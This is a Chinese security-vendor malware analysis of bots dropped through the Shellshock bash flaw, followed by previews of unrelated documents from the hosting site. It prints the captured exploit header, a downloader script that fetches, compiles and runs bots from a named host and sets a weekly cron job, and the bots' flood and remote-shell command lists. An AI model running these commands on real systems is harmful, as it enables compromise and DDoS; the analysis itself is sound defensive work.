“破壳”漏洞相关恶意代码样本分析报告_V1.9

Size: px
Start display at page:

Download "“破壳”漏洞相关恶意代码样本分析报告_V1.9"

Transcription

1 破壳 漏洞系列分析之二 安天实验室安全研究与应急处理中心 ( 安天 CERT) 首次发布时间 :2014 年 9 月 29 日 17 时 本版本更新时间 :2014 年 10 月 19 日 09 时 30 分

2 目录 1 破壳 漏洞概述 网络数据包 相关的恶意代码 恶意代码信息 恶意代码流程分析 恶意代码同源性分析 走出蠕虫地带 ( 代小结 ) 附录一 : 参考资料 附录二 : 关于安天 附录三 : 文档更新日志 安天实验室版权所有, 欢迎无损转载第 1 页

3 1 破壳 漏洞概述 安天实验室安全研究与应急处理中心 ( 以下简称 : 安天 CERT) 于 9 月 25 日凌晨开始响应 破壳 漏洞, 针对该漏洞的背景 原理等进行了快速地分析, 摸索完善了验证方法和网络检测方法 并于 9 月 25 日 10 时发布了 破壳 漏洞 (CVE ) 综合分析 ( 对应网址 : 并更新了多个版本 在这个过程中安天监测采集和样本交换体系发现了大量利用该漏洞的扫描攻击 后门投放等行为, 并发现了多个与此漏洞相关的恶意代码 2 网络数据包 基于漏洞的特点, 安天利用与高校联合部署的 探云 体系等进行了流量监测 发现了捕获了部分网 络攻击行为, 下面列举一个攻击包进行说明 : 从数据包信息可知 : 来源 40:00:35:06:57:a2 目的 45:00:00:f7:93:86 Host User-Agent () { :;}; /bin/bash -c "wget -O /tmp/sh;curl -o /tmp/sh /tmp/sh;rm -rf /tmp/sh" 主要攻击载荷位于 User-Agent 信息, 由于相关漏洞利用原理在 破壳 漏洞 (CVE ) 综合分析 中都已分析过, 我们不再赘述 从攻击载荷中我们可见, 下载 regular.bot 文件到 /tmp 目录, 命名为 sh 安天实验室版权所有, 欢迎无损转载第 2 页

4 文件, 并执行这个文件, 执行中去下载了其它恶意代码文件, 然后删除此文件 用于攻击的 sh 文件和再次下载的恶意代码文件, 都针对 Linux\Unix\Mac OS 等目标系统, 格式为 :ELF 文件或 perl bash 脚本 针对 CGI-BASH 的利用漏洞的传播方式非常好实现, 几句脚本就能够完成, 核心是运用构造好的 Http 头, 针对不同的 IP 进行探测,IP 只要在 Host 信息更换即可 3 相关的恶意代码 3.1 恶意代码信息 安天实验室版权所有, 欢迎无损转载第 3 页

5 1. 恶意代码信息 : 样本命名 原始文件名 对应样本 MD5 HASH 样本大小 (b) 格式 Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 5B345869F7785F980E8FF7EBC001E0C7 534,988 BinExecute/Linux.ELF[:X86] Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 7DA247A78D11ED80F B5EEF 538,444 BinExecute/Linux.ELF[:X64] Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 74CF76B AF8B36BA89C1980C1 534,988 BinExecute/Linux.ELF[:X86] Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 371B8B20D4DD207F7B3F61BB30A7CB22 538,444 BinExecute/Linux.ELF[:X64] Trojan[Bot]/Linux.Gafgyt.a 未知 ( 第三方样本 ) 5924BCC045BB7039F55C6CE29234E29A 538,444 BinExecute/Linux.ELF[:X64] Trojan[Bot]/Linux.WopBot 未知 ( 第三方样本 ) 8DC64426F9D07587C19E10F1BB3D ,900 BinExecute/Linux.ELF[:X64] Trojan/Linux.Small 未知 ( 第三方样本 ) A35B7A465361FAF92A512D 152 BinExecute/Linux.ELF[:X64] Trojan[Downloader]/Shell.Agent regular.bot F5E06E89E9387D044C7B0E7B0 701 Text/Shell.SH Trojan[Bot]/Linux.Tsunami kaiten.c E E25DA45E287AFB2F1E4580D6 391,30 Text/Dennis.C Trojan[Bot]/Linux.Tsunami a 7390A1E62A88EB80B5FAE80C9EB00BE7 982,256 BinExecute/Linux.ELF[:X64] Trojan[Bot]/OSX.Tsunami darwin ADACF1FA8CD7F77AE83BA38A99160BDB 42,436 BinExecute/OSX.APP Trojan[Bot]/Perl.IRCBot pl 0C25BEE177101B D694C0DE4D3 66,395 Text/Perl.Pl 安天实验室版权所有, 欢迎无损转载第 4 页

6 2. 样本分析卡片 : 样本命名 Trojan*Bot+/Linux.Gafgyt.a 样本 MD5 5924BCC045BB7039F55C6CE29234E29A 样本大小 (b) 538,444b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian X86_64 测试, 列出当前机器 MAC 地址 联网目标 样本反汇编分析 连接远程 IP: 端口 : ***. ***:5 主动连接控制端, 一旦连接成功, 便等待远程命令 获取本机 IP 连接服务器 TCP Flood DDOS 攻击 UDP Flood DDOS 攻击 安天实验室版权所有, 欢迎无损转载第 5 页

7 Hold Flood DDOS 攻击. 结束攻击指令 弱口令字典 主要行为 : 样本运行后尝试连接 :53/ :5 中的一个服务器 从以下文件中收集信息回传给服务器 :/proc/cpuinfo /proc/meminfo /proc/net/route 连接指定 IP 范围内计算机的 23 端口, 账号密码通过弱口令字典生成 从远程服务器接受指令运行, 具体指令格式如下 : 控制命令 格式 响应命令 PING - "PONG!" GETLOCALIP - "My IP: <local_ip>" SCANNER <MODE> "SCANNER ON OFF" if num_args!= 1, spawned thread responds otherwise? HOLD <IP> <PORT> <SECONDS> "HOLD Flooding <IP>:<PORT> for <SECONDS> seconds." JUNK <IP> <PORT> <SECONDS> "JUNK Flooding <IP>:<PORT> for <SECONDS> seconds." or error messages UDP <IP> <PORT> <SECONDS> <RAW/DGRAM> <PKT_SIZE> <THREADS> "UDP Flooding <IP>:<PORT> for <SECONDS> seconds." or error messages TCP <TARGETS,> <PORT> <SECONDS> <TCP_FLAGS,> <PKT_SIZE> <PKT_BURST> "TCP Flooding <IP>:<PORT> for <SECONDS> seconds." or error messages KILLATTK - "Killed <NUMBER_OF_ATTK_THREADS>." or "None Killed." LOLNOGTFO - None (exits bot process) 结论 是 Bot 类样本, 运行于 Linux 平台, 主动连接控制端, 等待远程控制 投放途径可能为利用 破壳 漏 安天实验室版权所有, 欢迎无损转载第 6 页

8 洞投放 样本命名 Trojan[Backdoor]/Linux.Gafgyt.a 样本 MD5 371B8B20D4DD207F7B3F61BB30A7CB22 样本大小 (b) 538,444b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian X86_64 测试, 列出当前机器 MAC 地址 联网目标 样本反汇编分析 连接远程 IP: 端口 : **.**:53 主动连接控制端, 一旦连接成功, 便等待远程命令 该样本与 5924BCC045BB7039F55C6CE29234E29A 仅存在服务器 IP 差异, 其他代码均完全相同, 此处不在重复, 具体行为可参见 5924BCC045BB7039F55C6CE29234E29A 结论是 Bot 类样本, 运行于 Linux 平台, 主动连接控制端, 等待远程控制 投放途径可能为利用 破壳 漏洞投放 样本命名 Trojan[Backdoor]/Linux.Gafgyt.a 样本 MD5 5B345869F7785F980E8FF7EBC001E0C7 样本大小 (b) 534,988b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X86] 运行状态 样本反汇编分析 在 Debian X86_64 测试, 无法运行, 是 ELF 32 位程序控制命令 :PING GETLOCALIP HOLD JUNK UDP TCP KILLATTK LOLNOGTFO 等连接远程 IP: 端口 : **.**:53 该样本与 5924BCC045BB7039F55C6CE29234E29A 仅存在服务器 IP 差异, 其他代码均完全相同, 此处不 安天实验室版权所有, 欢迎无损转载第 7 页

9 在重复, 具体行为可参见 5924BCC045BB7039F55C6CE29234E29A 样本命名 Trojan[Backdoor]/Linux.Gafgyt.a 样本 MD5 7DA247A78D11ED80F B5EEF 样本大小 (b) 538,444b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian X86_64 测试, 列出当前机器 MAC 地址 联网目标 样本反汇编分析 连接远程 IP: 端口 : ***.***:5 主动连接控制端, 一旦连接成功, 便等待远程命令 结论 该样本与 5924BCC045BB7039F55C6CE29234E29A 仅在数据段存在 93 字节差异, 不影响样本功能, 其他代码均完全相同, 此处不在重复, 具体行为可参见 5924BCC045BB7039F55C6CE29234E29A 是 Bot 类样本, 运行于 Linux 平台, 主动连接控制端, 等待远程控制 投放途径可能为利用 破壳 漏洞投放 样本命名 Trojan[Backdoor]/Linux.Gafgyt.a 样本 MD5 74CF76B AF8B36BA89C1980C1 样本大小 (b) 534,988b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X86] 运行状态 在 Debian X86_64 测试, 无法运行, 是 ELF 32 位程序 样本反汇编分析连接远程 IP: 端口 : ***.***:5 安天实验室版权所有, 欢迎无损转载第 8 页

10 该样本与 5924BCC045BB7039F55C6CE29234E29A 仅在数据段存在 93 字节差异, 不影响具体功能, 其他代码均完全相同, 此处不在重复, 具体行为可参见 5924BCC045BB7039F55C6CE29234E29A 样本命名 Trojan[Backdoor]Linux.WopBot 样本 MD5 8DC64426F9D07587C19E10F1BB3D2799 样本大小 (b) 525,900b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian X86_64 测试, 显示 :Wopbot has started 联网目标 样本反汇编分析 连接远程 IP: 端口 : ***.***:9003 主动连接控制端, 一旦连接成功, 便等待远程命令 UDP DDOS 攻击 SYN DDOS 攻击 TCP DDOS 攻击 HTTP DDOS 攻击 安天实验室版权所有, 欢迎无损转载第 9 页

11 结论 MINELORIS 指令结束攻击指令 样本运行后连接服务器接受指令控制, 主要指令都是 DDOS 相关, 如 :kill udp syn tcpamp dildos http mineloris 等 是 Bot 类样本, 运行于 Linux 平台, 主动连接控制端, 等待远程控制 投放途径可能为利用 破壳 漏洞投放 样本命名 Trojan/Linux.Small 样本 MD A35B7A465361FAF92A512D 样本大小 (b) 152b 原始文件名 未知 ( 第三方样本 ) 格式 BinExecute/Linux.ELF[:X64] 运行状态 网络行为 在 Debian X86_64 测试, 无任何显示, 但已执行 样本反汇编分析 连接远程 IP: 端口 : ***.***:4545 安天实验室版权所有, 欢迎无损转载第 10 页

12 结论 样本代码非常少, 运行后连接 27.*.*.224 下载文件到 /bin//sh 并运行 主动连接控网络, 下载恶意程序 样本命名样本 MD5 样本大小 (b) 原始文件名格式运行状态网络行为脚本内容 Trojan[Downloader]/Shell.Agent F5E06E89E9387D044C7B0E7B0 701b regular.bot Text/Shell.SH 运用 gcc 编译 kaiten.c, 执行 a, 执行 darwin, 执行 pl, 添加计划任务下载 :kaiten.c a darwin pl killall perl wget -O /tmp/a.c; curl -o /tmp/a.c gcc -o /tmp/a /tmp/a.c; /tmp/a; rm -rf /tmp/a.c; wget -O /tmp/a; curl -o /tmp/a chmod +x /tmp/a; /tmp/a; wget -O /tmp/d; curl -o /tmp/d chmod +x /tmp/d; /tmp/d; wget -O /tmp/pl; curl -o /tmp/pl perl /tmp/pl; rm /tmp/pl; 结论 echo "@weekly curl -o /tmp/sh -O /tmp/sh;sh /tmp/sh" >/tmp/c; crontab /tmp/c; rm /tmp/c; 是一个 sell 脚本, 下载 Bot 文件并运行, 将更新 URL 添加到计划任务, 定期下载执行 样本命名 Trojan[Backdoor]/Linux.Tsunami 样本 MD5 E E25DA45E287AFB2F1E4580D6 样本大小 (b) 391,30b 原始文件名 kaiten.c 安天实验室版权所有, 欢迎无损转载第 11 页

13 格式 Text/Dennis.C 来源地址 stablehost.us/bots/kaiten.c 网络行为 编译执行后连接 linksys.secureshellz.net 样本格式 C 源码 主要功能 发起各类 SYN 和 UDP 的分布式拒绝服务攻击 下载并执行远程文件 更改客户端的昵称 更改服务器地址 发送 UDP 数据包 结束进程 网络数据抓包 发起洪水攻击 kaiten.c 文件中的所列的攻击指令列表如下 : * TSUNAMI <target> <secs> = A PUSH+ACK flooder * * PAN <target> <port> <secs> = A SYN flooder * * UDP <target> <port> <secs> = An UDP flooder * * UNKNOWN <target> <secs> = Another non-spoof udp flooder * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from this bot * * ENABLE = Enables all packeting from this bot * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * 部分函数代码 : 安天实验室版权所有, 欢迎无损转载第 12 页

14 TSUNAMI 攻击代码 SYN DDOS 攻击代码 UDP DDOS 攻击代码 安天实验室版权所有, 欢迎无损转载第 13 页

15 结论 下载文件代码 这是一个名为 Tsunami 的 IRC DDOS client 的 C 源码文件, 利用 破壳 漏洞下载到目标主机, 并使用 gcc 命令编译为可执行程序后在目标主机执行 样本命名 Trojan[Backdoor]/Linux.Tsunami 样本 MD5 7390A1E62A88EB80B5FAE80C9EB00BE7 样本大小 (b) 982,256b 原始文件名 a 格式 BinExecute/Linux.ELF[:X64] 来源地址 stablehost.us/bots/a 网络行为 连接 :linksys.secureshellz.net 样本格式 ELF 64-bit 反汇编分析 服务器地址 更新服务器地址 安天实验室版权所有, 欢迎无损转载第 14 页

16 结束自身 运行文件 下载其他文件 发起各类 SYN 和 UDP 的分布式拒绝服务攻击, 具体如下 : TSUNAMI: 构造特殊包穿透大部分防火墙 PAN: 一种高级的 SYN DDOS 攻击 UDP: 常规 UDP DDOS 攻击 安天实验室版权所有, 欢迎无损转载第 15 页

17 结论 UNKNOWN: 另一种 UDP DDOS 攻击 NICK: 修改客户端名称 SERVER: 修改服务器 ENABLE/DISABLE: 开启 关闭抓包更改客户端的昵称这是一个 Linux 僵尸网络程序, 运行后会连接远程服务器, 接受攻击者指令控制被感染主机 样本命名 Trojan[Backdoor]/OSX.Tsunami 样本 MD5 ADACF1FA8CD7F77AE83BA38A99160BDB 样本大小 (b) 42,436b 原始文件名 darwin 格式 BinExecute/OSX.APP 来源地址 stablehost.us/bots/darwin 网络行为 linksys.secureshellz.net 样本格式 Mac OS X 64bit 主要功能 该样本与 7390A1E62A88EB80B5FAE80C9EB00BE7 是相同的恶意代码, 代码功能完全相同, 只是运行 的环境为 Mac, 具体功能可参见 7390A1E62A88EB80B5FAE80C9EB00BE7 结论 这是一个 Mac 僵尸网络程序, 运行后会连接远程服务器, 接受攻击者指令控制被感染主机 样本命名 Trojan[Backdoor]/Perl.IRCBot 样本 MD5 0C25BEE177101B D694C0DE4D3 样本大小 (b) 66,395b 原始文件名 pl 格式 Text/Perl.Pl 来源地址 stablehost.us/bots/pl 网络行为 连接远程 IP: 端口 : ***.***:25 (linksys.secureshellz.net) 主要功能 渗透攻击 : 多线程扫描 sock5 代理 SQL 攻击 端口扫描 发送邮件 nmap 扫描等 从 packetstorm milw0rm 获取最新漏洞信息 DDos:udp tcp http sql 洪水攻击 开放 IRC 通道 扫描 google msn ask yahoo search 等域 pl 脚本中的命令列表 #-----[Hacking Based]----- <vuln> <dork> <vuln> <dork> <col> <ip> <subject> <sender> <recipient> <message> 安天实验室版权所有, 欢迎无损转载第 16 页

18 <ip> <beginport> <endport> <ip><port> tmp:. for example #-----[Advisory-New Based] #-----[DDos Based]----- <host> <packet size> <time> <host> <port> <packet size> <time> <host> <time> <host> <time> #-----[IRC Based] #channel #channel <who> <who> <who> <who> <who> <who> <who> <who> #-----[Flooding Based]----- <who> <who> <who> <who> <who> #################################### 相关配置 指令配置 :hxxp://chynthea.org/injector/c99.txt??? ID 配置 :hxxp:// ircname :"telnet","putty","cgi-bin","bash","tmp","var","omset","dat","chynthe","bed" 结论这是一个 Perl 脚本编写的僵尸网络程序, 根据内部配置和控制端发送的指令进行相应的攻击 3.2 恶意代码流程分析 安天 探云 系统及形成部署的 VDS 网络病毒监控设备均捕获到大量攻击包 通过对其中的攻击载荷 的提取, 发现存在大量自动的重复载荷投放 例如第二章中的数据包中的载荷就存在大量重复投放的现象 安天实验室版权所有, 欢迎无损转载第 17 页

19 这样便可实现批量的攻击 下面以第二章所列出的数据包的相关攻击过程为例, 分析其攻击和使用相关样 本的作业过程 图 3-1 中 4 个相关样本均为僵尸网络程序, 得出攻击者是将不同操作系统 运行环境下编 译的同一源程序文件进行投放, 以达到能够感染 Linux Mac 及支持 gcc 或 Perl 环境的相关系统 图 3-1 漏洞与样本作业流程图 4 恶意代码同源性分析 为了适应 32 位与 64 位结构, 在两种版本的操作系统上都能够运行, 攻击者进行了同一源码的多次的编译 为了能够躲避反病毒软件的检测查杀, 攻击者也进行了简单的混淆 但无论是不同版本编译, 还是做各种混淆, 攻击者基于同一源码所做的程序文件仍能够找到共同点, 这些共同点为我们确定同源性提供了便利 具体见图 4-1, 我们发现在两个不同事件中的 6 个 破壳 投放的 Bot 具有同源性 安天实验室版权所有, 欢迎无损转载第 18 页

20 图 4-1 恶意代码同源性分析图 5 走出蠕虫地带 ( 代小结 ) 我们在 破壳 漏洞 (CVE ) 综合分析 报告中指出 破壳 漏洞 易于利用其编写蠕虫进行自动化传播, 同时也将导致僵尸网络的发展 几年来, 尽管我们捕获的蠕虫样本数量还在持续增长, 但其中真正有重大影响力的蠕虫确实并不多见 但今天, 我们看到了 蠕虫 这个熟悉而陌生的老对手, 借助 破壳 漏洞借尸还魂 如果说技术的发展是一个上升的螺旋, 在某一时刻会表现出 高阶重复 的话, 那么威胁的演进何尝不是如此呢? 反病毒工作者和反病毒产品为消亡蠕虫进行了很多尝试, 但蠕虫大面积减少的更大原因还是其生态的变化 Windows 系统控制 Outlook 的外部调用, 沉重打击了邮件蠕虫的传播 ;DEP ASLR UAC 等机制的引入, 大大降低了扫描溢出型蠕虫传播的效果 ; 对自动播放的控制, 又降低了 U 盘传播 而从另一个角度看, 随着漏洞私密化 攻击定向化的趋势, 有编写蠕虫价值的漏洞, 都被攻击者深藏武库, 谨慎使用 而同时, 一些僵尸网络的控制者, 也逐渐把利用蠕虫的方式扩展规模, 改为捆绑和 FAKEAV 等其他方式 走出蠕虫地带 是安天技术负责人在去年 XDEF 峰会上的同名报告, 也是安天 AVER 反思三部曲的第二部 报告反思了我们现有的大量从感知到分析的技术体系, 都是在蠕虫时代发端建立起来的, 其假定威胁的核心特点是攻击载荷不断重复投放 传播路径是从若干源头的树状展开 被感染的节点会大量分布 显然这种机制在 APT 的应对中变得薄弱和力不从心 而同时我们也看到更多用户也是在大规模蠕虫泛滥时, 逐渐建立起安全观念的, 往往只有网络大量阻塞时, 人们才感到网络威胁的价值 而此间, 那些更高级 安天实验室版权所有, 欢迎无损转载第 19 页

21 隐蔽可以带来战略影响的攻击与窃密则可能被忽略了 这次也是如此, 连我们自己都是在相关 BOT 和蠕虫出现后, 变得兴奋度提高 但我们要慎重看待这种 高阶重复 如果说一切安全威胁都存在着必然性, 有其规律和动力的话 我们只能说, 当漏洞掌握在少数攻击者手中时, 可能其表象会是发生在定向攻击乃至 APT 攻击当中, 以提高成功率和降低感知 但当严重漏洞一旦公开, 其不再具有任何隐蔽性可言, 而大量用户启动修补流程, 可攻击节点不断减少的时候 就会有更多的攻击者开始了利益最大化的数据或者节点的攫取, 此时 列王的纷争 就会变成 群鸦的盛宴 关于 心脏出血 是三年来最严重的漏洞定性后不过半年, 破壳 漏洞突然曝光, 然不过几日 : CVE CVE CVE CVE CVE 接踵而至 严重漏洞的披露, 经常有示范和攀比效应, 这是我们暂时能想到的 扎堆到来 的成因 每个地震都有连锁余震, 之后群鸦漫天 同时, 站在一个更熟悉 Windows 的安全团队视角看 Linux/MacOS, 无疑会有很多茫然, 重新编译带来诸多的不变, 大量版本带来的碎片化, 又给修补带来了很多不确定性 而自带的编译器和丰富的脚本则既是程序员的舞台, 也是攻击者的土壤 我们在 Windows 攻防中, 也经常可见 BAT 和 VBS 脚本, 但通常都是配角而非恶意代码功能主体 而除非目标是代码污染, 把一段 C++ 源码或者工程丢到被攻击者的场景中去编译的行为更非常罕见 而本报告中的 gcc 源码和 perl 脚本, 则价值完全不同, 而这种模式在过去和未来也都并不陌生 这个方式既符合场景特点, 同时也是一个轻量级的 免杀 而未来 Linux/MacOS 将是重要的攻防战场, 尽管相关恶意代码的加壳 混淆工具和 Windows 下大量的地下壳 商用壳相比还那样简单幼稚, 但一切早已经开始了 此版本修订完成之际临近午饭, 此时正值国庆假期前最后一个工作日, 后勤组的同事正在分发福利, 多数下午同事会提前放假 而我们, 代号 弹头 的安天深度分析组会留下坚守 这种感觉在安天的集体记忆中似曾相识,2003 年的 Slammer 爆发就在农历腊月二十三 被称为小年的那一天, 窗外鞭炮齐鸣, 网络上病毒数据包蜂拥而过, 而安天人在突击的编写检测和处置工具 2004 年 5 月 1 日, 当 pluck 等辗转在回家的长途车上的时候, 他从短信里知道了震荡波蠕虫爆发的消息, 以及要求归队的命令 威胁经常在人们不期望它们到来的时候到来, 也许是无心的雪崩, 也许是有意的蓄谋 病毒不会在星期天休息 这是安天新员工培训时必须传递的一句话, 我们从柏松那里听到过这句话, 我们也把这句话讲给过安天的新人 我们也许会在一瞬间被威胁打的措手不及, 但不会有威胁能长久的逃逸出我们的感知和分析 谨把我们的工作献给我们家人 我们的战友和我们的祖国 安天实验室版权所有, 欢迎无损转载第 20 页

22 附录一 : 参考资料 [1] 安天实验室 : " 破壳 " 漏洞 (CVE ) 综合分析 [2] 知道创宇 : 破壳漏洞(ShellShock) 应急概要 [3] 知道创宇 : Bash 命令执行漏洞分析 [4] First Shellshock botnet attacks Akamai US DoD networks 安天实验室版权所有, 欢迎无损转载第 21 页

23 [5] Linux ELF bash 0day (shellshock): The fun has only just begun... [6] 安天实验室 : 走出蠕虫木马地带 AVER 反思三部曲之二 附录二 : 关于安天 安天是专业的下一代安全检测引擎研发企业, 安天的检测引擎为网络安全产品和移动设备提供病毒和各种恶意代码的检测能力, 并被超过十家以上的著名安全厂商所采用, 全球有数万台防火墙和数千万部手机的安全软件内置有安天的引擎 安天获得了 2013 年度 AV-TEST 年度移动设备最佳保护奖 依托引擎 沙箱和后台体系的能力, 安天进一步为行业企业提供有自身特色的基于流量的反 APT 解决方案 关于反病毒引擎更多信息请访问 : 中文 ) ( 英文 ) 关于安天反 APT 相关产品更多信息请访问 : 附录三 : 文档更新日志 更新日期 更新版本 更新内容 :00 V1.0 文档创建 文档架构 文档概述 :00 V1.1 网络数据包 恶意代码分析 :00 V1.2 增加 VDS 匹配样本分析 :30 V1.3 增加 perl 分析 :50 V1.4 增加各样本单独分析 ( 网络 代码 ) :30 V1.5 增加破壳漏洞利用代码流程分析 :30 V1.6 增加破壳漏洞投放样本同源性分析 :30 V1.7 针对 Linux/MacOS 恶意代码总结 :30 V1.8 修改总结 :59 V1.81 完善 修订和纠错 :40 V1.82 更换模板 :30 V1.9 样本分析部分修改 安天实验室版权所有, 欢迎无损转载第 22 页

24 安天实验室版权所有, 欢迎无损转载第 23 页

Trojan[DDOS]/Linux. Znaich分析笔记

Trojan[DDOS]/Linux. Znaich分析笔记 安天安全研究与应急处理中心 (Antiy CERT) 目录 编者按... 1 1 概述... 1 2 感染源... 1 3 样本分析... 3 4 总结... 7 附录一 : 参考资料... 7 附录二 : 关于安天... 7 安天实验室版权所有, 欢迎无损转载第 2 页 编者按 安天 CERT 这篇分析笔记完成于 2015 年 1 月 18 日, 但撰写后并未公开, 为让安全工作者更进一步了解 IoT

More information

六域链联盟 SDChain-Matrix 节点搭建指南 2018/07/26 Version : 1.0.0

六域链联盟 SDChain-Matrix 节点搭建指南 2018/07/26 Version : 1.0.0 SDChain-Matrix 节点搭建指南 目录 1 环境要求... 3 2 软件下载... 4 3 安装部署... 4 3.1 部署可执行程序目录... 4 3.2 部署配置文件目录... 4 3.3 部署数据库文件目录... 4 3.4 部署日志文件目录... 4 3.5 部署依赖库文件目录... 4 4 配置参数... 5 5 启动运行... 7 5.1 普通模式启动... 7 5.2 加载启动模式...

More information

穨UPSentry_SC_.PDF

穨UPSentry_SC_.PDF 3Phase UPSentry For: Windows 95/98/Me Windows NT40/2000/XP Table of Contents Chapter 0 Getting Started 0-1 0-1 0-1 0-2 Chapter 1 3Phase UPSentry 1-1 1-1 1-1 1-1 1-3 Chapter 2 3Phase UPSentry 2-1 Chapter

More information

QVM330 多阜寬頻路由器

QVM330 多阜寬頻路由器 俠 諾 神 捕 QnoSniff 專 業 版 2.0 繁 體 中 文 使 用 手 冊 目 錄 一 簡 介... 4 二 QnoSniff 專 業 版 系 統 安 裝 與 配 置... 6 2.1 開 始 之 前 的 準 備... 6 2.2 QnoSniff 專 業 版 安 裝 過 程 中 所 需 元 件... 6 2.3 佈 署 連 接 範 例 拓 樸... 7 2.4 開 始 安 裝... 7

More information

QVM330 多阜寬頻路由器

QVM330 多阜寬頻路由器 侠 诺 神 捕 QnoSniff 专 业 版 2.0 简 体 中 文 使 用 手 册 目 录 一 简 介... 4 二 QnoSniff 专 业 版 系 统 安 装 与 配 置... 5 2.1 开 始 之 前 的 准 备... 5 2.2 QnoSniff 专 业 版 安 装 过 程 中 所 需 组 件... 5 2.3 布 署 连 接 范 例 拓 朴... 6 2.4 开 始 安 装... 6

More information

ch08.PDF

ch08.PDF 8-1 CCNA 8.1 CLI 8.1.1 8-2 8-3 8.1.21600 2500 1600 2500 / IOS 8-4 8.2 8.2.1 A 5 IP CLI 1600 2500 8-5 8.1.2-15 Windows 9598NT 2000 HyperTerminal Hilgraeve Microsoft Cisco HyperTerminal Private Edition (PE)

More information

IP505SM_manual_cn.doc

IP505SM_manual_cn.doc IP505SM 1 Introduction 1...4...4...4...5 LAN...5...5...6...6...7 LED...7...7 2...9...9...9 3...11...11...12...12...12...14...18 LAN...19 DHCP...20...21 4 PC...22...22 Windows...22 TCP/IP -...22 TCP/IP

More information

untitled

untitled 1....2...2...6 2....10 3. UDP...15 4. TCP...16...16...16 1 1. PC COM1 COM2 COM1 COM2 DTU 2 3 4 COM1 COM1 COM2 COM ID 13900000000 DTU COM1 5 COM2 DTU DTU DTU DTU DTU DTU DTU ID ID 3031 3032 2 ID 13900000001

More information

C6_ppt.PDF

C6_ppt.PDF C01-202 1 2 - (Masquerade) (Replay) (Message Modification) (Denial of Service) - ( ) (Eavesdropping) (Traffic Analysis) 8 1 2 7 3 6 5 4 3 - TCP SYN (SYN flood) Smurf Ping of Death LAND Attack Teardrop

More information

ext-web-auth-wlc.pdf

ext-web-auth-wlc.pdf 使 用 无 线 局 域 网 控 制 器 的 外 部 Web 身 份 验 证 配 置 示 例 目 录 简 介 先 决 条 件 要 求 使 用 的 组 件 规 则 背 景 信 息 外 部 Web 身 份 验 证 过 程 网 络 设 置 配 置 为 来 宾 用 户 创 建 动 态 接 口 创 建 预 先 身 份 验 证 ACL 在 WLC 上 为 来 宾 用 户 创 建 本 地 数 据 库 配 置 外 部

More information

软件概述

软件概述 Cobra DocGuard BEIJING E-SAFENET SCIENCE & TECHNOLOGY CO.,LTD. 2003 3 20 35 1002 010-82332490 http://www.esafenet.com Cobra DocGuard White Book 1 1....4 1.1...4 1.2 CDG...4 1.3 CDG...4 1.4 CDG...5 1.5

More information

R3105+ ADSL

R3105+ ADSL ... 1 1 1... 1 1 2... 1... 3 2 1... 3 2 2... 3 2 3... 5 2 4... 5 2 4 1... 5... 7 3 1... 7 3 2... 8 3 2 1... 8 3 2 2... 9 3 3... 12 3 3 1... 13 3 3 2 WAN... 16 3 3 3 LAN... 21 3 3 4 NAT... 22 3 3 5... 24

More information

<4D6963726F736F667420506F776572506F696E74202D2030325FC2B2B3F85FA44AAB49B0BBB4FABB50B977A8BEA874B2CEC2B2A4B6BB50C0B3A5CE2E707074>

<4D6963726F736F667420506F776572506F696E74202D2030325FC2B2B3F85FA44AAB49B0BBB4FABB50B977A8BEA874B2CEC2B2A4B6BB50C0B3A5CE2E707074> 入 侵 偵 測 與 預 防 系 統 簡 介 與 應 用 蕭 翔 之 講 師 BS 7799 LA 課 程 大 綱 第 一 章 認 識 入 侵 偵 測 與 預 防 系 統 第 二 章 入 侵 偵 測 與 預 防 系 統 的 功 能 分 類 偵 測 技 術 第 三 章 入 侵 偵 測 與 預 防 系 統 部 署 架 構 第 四 章 入 侵 偵 測 與 預 防 系 統 的 應 用 效 益 第 五 章 結

More information

ARP ICMP

ARP ICMP ARP ICMP 2 9-1 ARP 9-2 ARP 9-3 ARP 9-4 ICMP 9-5 ICMP 9-6 ICMP 9-7 ICMP 3 ARP ICMP TCP / IP, IP ARP ICMP 3 IP, ARP ICMP IP ARP ICMP 2, 4 9-1 ARP, MAC, IP IP, MAC ARP Address Resolution Protocol, OSI ARP,,

More information

SL2511 SR Plus 操作手冊_單面.doc

SL2511 SR Plus 操作手冊_單面.doc IEEE 802.11b SL-2511 SR Plus SENAO INTERNATIONAL CO., LTD www.senao.com - 1 - - 2 - .5 1-1...5 1-2...6 1-3...6 1-4...7.9 2-1...9 2-2 IE...11 SL-2511 SR Plus....13 3-1...13 3-2...14 3-3...15 3-4...16-3

More information

2015绿盟科技DDoS威胁报告

2015绿盟科技DDoS威胁报告 2016 绿 盟 科 技 关 于 中 国 电 信 云 堤 2008 年 以 来, 中 国 电 信 开 始 着 力 于 网 络 DDoS 攻 击 防 护 能 力 建 设, 已 形 成 了 覆 盖 国 内 31 省 和 亚 太 欧 洲 北 美 等 主 要 POP 点 的 一 体 化 攻 击 防 御 能 力 2014 年, 中 国 电 信 首 次 在 业 界 系 统 性 提 出 电 信 级 网 络 集 约

More information

網路安全:理論與實務 第二版

網路安全:理論與實務 第二版 第 10 章 :Wireshark 封 包 分 析 軟 體 10-1 Wireshark 簡 介 10-2 Wireshark 的 安 裝 方 法 10-3 Wireshark 的 使 用 Wireshark 簡 介 - 發 展 歷 史 Wireshark (http://www.wireshark.org/) 是 一 個 開 放 原 始 碼 (open source software) 軟 體,

More information

Chapter #

